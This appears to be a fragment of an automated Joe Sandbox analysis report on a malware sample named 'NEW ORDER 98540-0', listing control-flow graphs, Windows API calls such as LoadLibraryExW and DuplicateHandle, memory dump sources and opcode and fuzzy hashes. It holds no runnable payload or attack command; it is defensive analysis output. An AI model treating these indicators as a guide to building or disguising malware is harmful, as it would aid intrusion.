                                              • Opcode ID: 8e248b1b403eb8e2f318eaced9f21752d30b298073fc2455d6df7a29545cba63
                                              • Instruction ID: 125b8ea4c9d2a74a4fd527a8395a87a4daded2bc93d60ed4384954037f5d702c
                                              • Opcode Fuzzy Hash: 8e248b1b403eb8e2f318eaced9f21752d30b298073fc2455d6df7a29545cba63
                                              • Instruction Fuzzy Hash: 2C51CCB1D00249DFDF14CF99C994ADEBFB6BF48310F24826AE819AB210D7749885CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2021 55c45b0-55c4616 2022 55c4618-55c461e 2021->2022 2023 55c4621-55c4628 2021->2023 2022->2023 2024 55c462a-55c4630 2023->2024 2025 55c4633-55c46d2 CreateWindowExW 2023->2025 2024->2025 2027 55c46db-55c4713 2025->2027 2028 55c46d4-55c46da 2025->2028 2032 55c4715-55c4718 2027->2032 2033 55c4720 2027->2033 2028->2027 2032->2033 2034 55c4721 2033->2034 2034->2034
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055C46C2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: 566f48addaf33e8aa54f0df31163c3105cd81a2a3088db1c20c017509477222a
                                              • Instruction ID: 64c12dc963510cff5251b1b34a51bdb23eb206a6a13efddbf601a8ddf0aeefcf
                                              • Opcode Fuzzy Hash: 566f48addaf33e8aa54f0df31163c3105cd81a2a3088db1c20c017509477222a
                                              • Instruction Fuzzy Hash: AE41BCB1D00249DFDF14CF9AC994ADEBFB5BF48310F24816AE819AB210D775A885CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2035 13758ed-13759b9 CreateActCtxA 2037 13759c2-1375a1c 2035->2037 2038 13759bb-13759c1 2035->2038 2045 1375a1e-1375a21 2037->2045 2046 1375a2b-1375a2f 2037->2046 2038->2037 2045->2046 2047 1375a31-1375a3d 2046->2047 2048 1375a40 2046->2048 2047->2048 2050 1375a41 2048->2050 2050->2050
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 013759A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 87d6281f97285831fb90ce027e475915cf754def98984b53da5f87f7877b34bd
                                              • Instruction ID: 6ab9e555fc1d33ba7ec3d13c3ec63b83657ec17040e56206305284d38b3eccfe
                                              • Opcode Fuzzy Hash: 87d6281f97285831fb90ce027e475915cf754def98984b53da5f87f7877b34bd
                                              • Instruction Fuzzy Hash: F341E0B0C0071DCFEB25DFAAC984B9EBBB5BF89304F20816AD408AB251DB755946CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2051 55c2a64-55c6bbc 2055 55c6c6c-55c6c8c call 55c293c 2051->2055 2056 55c6bc2-55c6bc7 2051->2056 2063 55c6c8f-55c6c9c 2055->2063 2058 55c6bc9-55c6c00 2056->2058 2059 55c6c1a-55c6c52 CallWindowProcW 2056->2059 2065 55c6c09-55c6c18 2058->2065 2066 55c6c02-55c6c08 2058->2066 2061 55c6c5b-55c6c6a 2059->2061 2062 55c6c54-55c6c5a 2059->2062 2061->2063 2062->2061 2065->2063 2066->2065
                                              APIs
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 055C6C41
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID: CallProcWindow
                                              • String ID:
                                              • API String ID: 2714655100-0
                                              • Opcode ID: 3e9edacf1cb22a100b891ffc60cc54d99694403f9f2d3ef5dcc2d20892620b09
                                              • Instruction ID: 7ba3502021c10741112aa9b652a6ebedc2329097fb220383c4f2d8ddc2b39f5f
                                              • Opcode Fuzzy Hash: 3e9edacf1cb22a100b891ffc60cc54d99694403f9f2d3ef5dcc2d20892620b09
                                              • Instruction Fuzzy Hash: EB41F9B5900305DFDB14CF99C888AAABBF5FF88314F24849DD519AB321D775A941CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2069 13744f0-13759b9 CreateActCtxA 2072 13759c2-1375a1c 2069->2072 2073 13759bb-13759c1 2069->2073 2080 1375a1e-1375a21 2072->2080 2081 1375a2b-1375a2f 2072->2081 2073->2072 2080->2081 2082 1375a31-1375a3d 2081->2082 2083 1375a40 2081->2083 2082->2083 2085 1375a41 2083->2085 2085->2085
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 013759A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 3d974f358277127b89bbbafcf47d71f966b0953f9fc1dfb2a96b52681f958c2b
                                              • Instruction ID: cdd8a3f1dac5a7063e152a1932555e438bc0d9b511cf2d5e9dc2ff01b9cbdb64
                                              • Opcode Fuzzy Hash: 3d974f358277127b89bbbafcf47d71f966b0953f9fc1dfb2a96b52681f958c2b
                                              • Instruction Fuzzy Hash: FE41E470C0071DCBEB25DFAAC984B9EBBF5BF89704F20806AD418AB251DB756945CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2086 55c001a-55c003d 2087 55c003f-55c0094 2086->2087 2088 55c0096 2086->2088 2087->2088 2089 55c0097-55c00d4 DuplicateHandle 2088->2089 2090 55c00dd-55c00fa 2089->2090 2091 55c00d6-55c00dc 2089->2091 2091->2090
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 055C00C7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: f426eec31434292ff7da98cac4fbe94630b0a61e0efa725655213734978561fc
                                              • Instruction ID: c6547b86ec14d71ee6b1af0ccd5c232a9e0a5ef0dfcc9bf505c87c2c59510fdb
                                              • Opcode Fuzzy Hash: f426eec31434292ff7da98cac4fbe94630b0a61e0efa725655213734978561fc
                                              • Instruction Fuzzy Hash: EF3149B6800248DFCB11CFA9D985AEEBFF4FB08320F54845AE814B7251D339A944CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2094 55c0040-55c00d4 DuplicateHandle 2096 55c00dd-55c00fa 2094->2096 2097 55c00d6-55c00dc 2094->2097 2097->2096
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 055C00C7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 91667d6b62e89db6d25385b5b57c9fbdd683d87de46fb700844fc592bee99622
                                              • Instruction ID: c1f946e3ec422fdc22325fa1822a2354b22350225ad54e8586700443c9746ceb
                                              • Opcode Fuzzy Hash: 91667d6b62e89db6d25385b5b57c9fbdd683d87de46fb700844fc592bee99622
                                              • Instruction Fuzzy Hash: 5021E4B5900209DFDB10CF9AD984ADEBFF4FB48320F14845AE918A3350D379A954CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2100 137d4b0-137df08 2102 137df10-137df3f LoadLibraryExW 2100->2102 2103 137df0a-137df0d 2100->2103 2104 137df41-137df47 2102->2104 2105 137df48-137df65 2102->2105 2103->2102 2104->2105
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0137DD21,00000800,00000000,00000000), ref: 0137DF32
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 8d592d41cf1f943940ab1a355a924a8f6d7ab7c17a3e3a643e953b72e420f571
                                              • Instruction ID: 6ed17a7422122b9e21f6f8d601ee4efadb23f1fdf82c3c6e2e889fcb93534d5a
                                              • Opcode Fuzzy Hash: 8d592d41cf1f943940ab1a355a924a8f6d7ab7c17a3e3a643e953b72e420f571
                                              • Instruction Fuzzy Hash: C31114B68043499FDB20CF9AC944A9EFBF4EF88314F10842AE519A7600C379A545CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2108 137dc40-137dc80 2109 137dc82-137dc85 2108->2109 2110 137dc88-137dcb3 GetModuleHandleW 2108->2110 2109->2110 2111 137dcb5-137dcbb 2110->2111 2112 137dcbc-137dcd0 2110->2112 2111->2112
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0137DCA6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 0258bf1fbe53982709c1e2f81ba09ca28d7ff5c4060bfae475fa31b088c9db21
                                              • Instruction ID: ef2c7011cc0d203577825ee00c24648f1f6076e5533516412cbe0909ff57f472
                                              • Opcode Fuzzy Hash: 0258bf1fbe53982709c1e2f81ba09ca28d7ff5c4060bfae475fa31b088c9db21
                                              • Instruction Fuzzy Hash: 791110B6C0034A8FDB20CF9AC544BDEFBF4AF88224F10841AD918B7200D3B9A545CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2107294713.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_131d000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 046e5db57a984687a8bdf4883ebad427e30405e751651c8ddabe245c1160ba36
                                              • Instruction ID: 7a0d9fae1bbc6b3a8fd1a240ac829e6337eee5726ceaed9253692cea2e14779b
                                              • Opcode Fuzzy Hash: 046e5db57a984687a8bdf4883ebad427e30405e751651c8ddabe245c1160ba36
                                              • Instruction Fuzzy Hash: C0216A72144204DFDB09DF44D9C4B66BF65FB88328F20C56CE90A1B25ACB36E456CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2107352263.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_132d000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e26d23c9fce8ba2e0d798d37ff4a01fbc0cd03eb7b8dcd6ca5165d61f7572110
                                              • Instruction ID: 883d0120876f3938847ba48e3f70c9b247572dfb72383f83f9355d1109464411
                                              • Opcode Fuzzy Hash: e26d23c9fce8ba2e0d798d37ff4a01fbc0cd03eb7b8dcd6ca5165d61f7572110
                                              • Instruction Fuzzy Hash: 83214671504304EFDB05EF94D9C0B26BBA5FB85328F20C56DE9094B252C776D406CA61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2107352263.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_132d000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 09a8f1dea3537bceca2265e6d2a412109e6c7086e4040347629d0d262bfac959
                                              • Instruction ID: 23d2eba00af535b3a1af30c63a8c0905c8dd7a54a17843326fc6e3d54197b639
                                              • Opcode Fuzzy Hash: 09a8f1dea3537bceca2265e6d2a412109e6c7086e4040347629d0d262bfac959
                                              • Instruction Fuzzy Hash: D3213475604344EFDB15EF54D9C0B26BF65FB84318F20C56DD90A0B2A6C77AD407CAA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2107352263.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_132d000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 94c2d574518cd4aa26ea1a7301a33f367d9be3111c9cd45d224bf54665a59eaa
                                              • Instruction ID: 8b9d9be5050cf352207ae1db545714b410343eae9534b3b6f7324d2bf437598b
                                              • Opcode Fuzzy Hash: 94c2d574518cd4aa26ea1a7301a33f367d9be3111c9cd45d224bf54665a59eaa
                                              • Instruction Fuzzy Hash: BD2180755083809FCB02DF64D994715BF71EB46218F28C5DAD8498F2A7C33A9816CB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2107294713.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_131d000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                              • Instruction ID: ba7f4d496f614ce480ae26b42b79ba31260e533d1edeed82322ca7cd473a0b7d
                                              • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                              • Instruction Fuzzy Hash: C11126B6404280CFCB16CF44D5C4B56BF71FB84328F24C6A9D8090B25BC73AE456CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2107352263.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_132d000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                              • Instruction ID: 681e35ae1a07b6eb3c6bdabea06138533094b681fa0b7d9863f84abed262ae1f
                                              • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                              • Instruction Fuzzy Hash: 9311BB75504380DFDB02DF54D5C0B15BBB1FB85228F24C6A9D8494B2A6C33AD40ACB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-3916222277
                                              • Opcode ID: 5792d64da9808bf7346c03161e469a251873eed9fafff294e9a7d9a10abbf123
                                              • Instruction ID: 137fbeddab13c4f9b40dc4d613c8db0d00a757a7b7f0813f6e0f32c7b86043c5
                                              • Opcode Fuzzy Hash: 5792d64da9808bf7346c03161e469a251873eed9fafff294e9a7d9a10abbf123
                                              • Instruction Fuzzy Hash: 5951D131B101168FCB65DFADDC846AEBBB2EBC82297158179D605CB355EB74EC428780
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8dd440a8cb38fb041c8b310c7d92dfe139cbfff4a06082cd3f64eb5061269906
                                              • Instruction ID: ad5f0b8bb8eb28a762bc19063bac05b909b9fb0f640d3544c98b74146bc58fb7
                                              • Opcode Fuzzy Hash: 8dd440a8cb38fb041c8b310c7d92dfe139cbfff4a06082cd3f64eb5061269906
                                              • Instruction Fuzzy Hash: 621290B1401746DAEB30CF69E84C1897BB9BB81328FD04309D6616B6EDDBB8154BCF84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 873b66a02c5991f44a14abc8a4ce32564a7218011977e2fd04130fee13a972bd
                                              • Instruction ID: 0321a6eff75beac5c08ec123a191a7b1494847c18cc2d03859f01bcdacea6766
                                              • Opcode Fuzzy Hash: 873b66a02c5991f44a14abc8a4ce32564a7218011977e2fd04130fee13a972bd
                                              • Instruction Fuzzy Hash: 51A15136E00216CFCF15DFA4C8485AEBBB2FF85300B1545AEE906AB265DB71D945CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f2cd13091c8a63f401a781b058dbe561f31f4e10a40b8164b8a5f804edaa7cdd
                                              • Instruction ID: 3ada4355d7946e37196c66f5edd7a1e47c4a4c549900ae86223a4e0daea4291f
                                              • Opcode Fuzzy Hash: f2cd13091c8a63f401a781b058dbe561f31f4e10a40b8164b8a5f804edaa7cdd
                                              • Instruction Fuzzy Hash: 15C115B1801745DBDB20CF69E84C1897BB9BB85324F914319D2616B2EDDBB8158BCF84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3d97aba45fa73ef96f6c80d65a99c87ccb2838361aa0a47c976a647e0e614a03
                                              • Instruction ID: 053af7225e1784a495768d1b4972f5a38493dfc2103bc6a78712ee4925585cb2
                                              • Opcode Fuzzy Hash: 3d97aba45fa73ef96f6c80d65a99c87ccb2838361aa0a47c976a647e0e614a03
                                              • Instruction Fuzzy Hash: 6681F9B8D4010FDFDF24CFAAD584AAEBBB1BB48314F10A659D412EB254DB3599418F50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3faaa1c0a61565e62678eb2e32848acca8d4b0f8906273a80f1538b89e47fcab
                                              • Instruction ID: a32befa408ce3eaafcdc2462ce84ec3ca94d0621697de6b987030695df9b8f7e
                                              • Opcode Fuzzy Hash: 3faaa1c0a61565e62678eb2e32848acca8d4b0f8906273a80f1538b89e47fcab
                                              • Instruction Fuzzy Hash: DC614E32F115258FD714DB69CC84A5EB7E3AFC8714F1A81A4E409AB356DE74EC018B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:11.1%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:3
                                              Total number of Limit Nodes:0
                                              execution_graph 27095 67ce278 27096 67ce2be GlobalMemoryStatusEx 27095->27096 27097 67ce2ee 27096->27097
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1fbcbf3923ea7fa941295e8de5a894953165aebff5d3f5a7c1a9f6be761d4930
                                              • Instruction ID: 95c9176e2f7a822a120b4dfc0d813353141b81a6f4f0e30596f7408eb2ffd0f4
                                              • Opcode Fuzzy Hash: 1fbcbf3923ea7fa941295e8de5a894953165aebff5d3f5a7c1a9f6be761d4930
                                              • Instruction Fuzzy Hash: 8453F531D10B5A8ADB51EF68C8805A9F7B1FF99300F15D79AE4587B121FB70AAC4CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fdf99d962afa96f7d330b9da63254f3e31b7fc8a701c4a11f78651e992698225
                                              • Instruction ID: 379c21a155579854bce30db3d48a908ad5b8e14489316fce58ca0053df8e9a2c
                                              • Opcode Fuzzy Hash: fdf99d962afa96f7d330b9da63254f3e31b7fc8a701c4a11f78651e992698225
                                              • Instruction Fuzzy Hash: 5D331C31D1071A8ADB11EF68C8806ADF7B5FF99300F15C79AD449AB215EB70AAC5CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1191 30d3e80-30d3ee6 1194 30d3ee8-30d3ef3 1191->1194 1195 30d3f30-30d3f32 1191->1195 1194->1195 1196 30d3ef5-30d3f01 1194->1196 1197 30d3f34-30d3f8c 1195->1197 1198 30d3f24-30d3f2e 1196->1198 1199 30d3f03-30d3f0d 1196->1199 1206 30d3f8e-30d3f99 1197->1206 1207 30d3fd6-30d3fd8 1197->1207 1198->1197 1200 30d3f0f 1199->1200 1201 30d3f11-30d3f20 1199->1201 1200->1201 1201->1201 1203 30d3f22 1201->1203 1203->1198 1206->1207 1208 30d3f9b-30d3fa7 1206->1208 1209 30d3fda-30d3ff2 1207->1209 1210 30d3fa9-30d3fb3 1208->1210 1211 30d3fca-30d3fd4 1208->1211 1216 30d403c-30d403e 1209->1216 1217 30d3ff4-30d3fff 1209->1217 1212 30d3fb5 1210->1212 1213 30d3fb7-30d3fc6 1210->1213 1211->1209 1212->1213 1213->1213 1215 30d3fc8 1213->1215 1215->1211 1218 30d4040-30d40a2 1216->1218 1217->1216 1219 30d4001-30d400d 1217->1219 1228 30d40ab-30d40cb 1218->1228 1229 30d40a4-30d40aa 1218->1229 1220 30d400f-30d4019 1219->1220 1221 30d4030-30d403a 1219->1221 1222 30d401d-30d402c 1220->1222 1223 30d401b 1220->1223 1221->1218 1222->1222 1225 30d402e 1222->1225 1223->1222 1225->1221 1233 30d40d5-30d410b 1228->1233 1229->1228 1236 30d410d-30d4111 1233->1236 1237 30d411b-30d411f 1233->1237 1236->1237 1238 30d4113 1236->1238 1239 30d412f-30d4133 1237->1239 1240 30d4121-30d4125 1237->1240 1238->1237 1242 30d4135-30d4139 1239->1242 1243 30d4143-30d4147 1239->1243 1240->1239 1241 30d4127-30d412a call 30d0ab8 1240->1241 1241->1239 1242->1243 1247 30d413b-30d413e call 30d0ab8 1242->1247 1244 30d4149-30d414d 1243->1244 1245 30d4157-30d415b 1243->1245 1244->1245 1248 30d414f-30d4152 call 30d0ab8 1244->1248 1249 30d415d-30d4161 1245->1249 1250 30d416b-30d416f 1245->1250 1247->1243 1248->1245 1249->1250 1253 30d4163 1249->1253 1254 30d417f 1250->1254 1255 30d4171-30d4175 1250->1255 1253->1250 1257 30d4180 1254->1257 1255->1254 1256 30d4177 1255->1256 1256->1254 1257->1257
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vm
                                              • API String ID: 0-711957416
                                              • Opcode ID: 5fce3a8b6f84b9918dfef2f8f0772ac82ee3aad80fe9f1a8373dea9e33254895
                                              • Instruction ID: 0fdcf017635817dc317ddfff3d21a4f659d04e0afac1dab9618be1cb35e49bac
                                              • Opcode Fuzzy Hash: 5fce3a8b6f84b9918dfef2f8f0772ac82ee3aad80fe9f1a8373dea9e33254895
                                              • Instruction Fuzzy Hash: 45916A74E01309DFDF50CFAAD9857DEBBF2AF88314F188129E415AB294EB749845CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1bae66e13ccaab0e1e9dc62afacdfd8f011979e4b68a79e27998681072be32eb
                                              • Instruction ID: ab29d722f8909de5a79024d60d7a3c9ff27217665d4d997c6c0d5be08b4f79e4
                                              • Opcode Fuzzy Hash: 1bae66e13ccaab0e1e9dc62afacdfd8f011979e4b68a79e27998681072be32eb
                                              • Instruction Fuzzy Hash: 6DB15B70E013098FDF50CFAAC8957ADBBF2AF88714F198529D815EB294EB749845CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
